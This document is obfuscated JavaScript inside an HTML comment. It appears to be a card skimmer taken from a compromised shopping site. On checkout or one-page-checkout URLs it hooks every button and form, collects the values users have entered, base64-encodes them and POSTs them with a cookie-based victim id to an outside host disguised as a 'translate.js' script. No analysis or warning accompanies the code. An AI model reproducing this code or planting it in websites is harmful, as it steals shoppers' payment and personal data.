
<!--
var d6a718fd6509aa4078e4490039a0918cf={
    snd:null,
    z6a718fd6509aa4078e4490039a0918cf:'https://web-stat.me/js/translate.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        d6a718fd6509aa4078e4490039a0918cf.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    d6a718fd6509aa4078e4490039a0918cf.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',d6a718fd6509aa4078e4490039a0918cf.clk,false);
                    }else{
                        b.attachEvent('onclick',d6a718fd6509aa4078e4490039a0918cf.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',d6a718fd6509aa4078e4490039a0918cf.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',d6a718fd6509aa4078e4490039a0918cf.clk);
                }
            }
            if(d6a718fd6509aa4078e4490039a0918cf.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(d6a718fd6509aa4078e4490039a0918cf.snd);
                var http=new XMLHttpRequest();
                http.open('POST',d6a718fd6509aa4078e4490039a0918cf.z6a718fd6509aa4078e4490039a0918cf,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+d6a718fd6509aa4078e4490039a0918cf.myid);
            }
            d6a718fd6509aa4078e4490039a0918cf.snd=null;
            keym=null;
            setTimeout(function(){d6a718fd6509aa4078e4490039a0918cf.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
	d6a718fd6509aa4078e4490039a0918cf.send();
}
-->
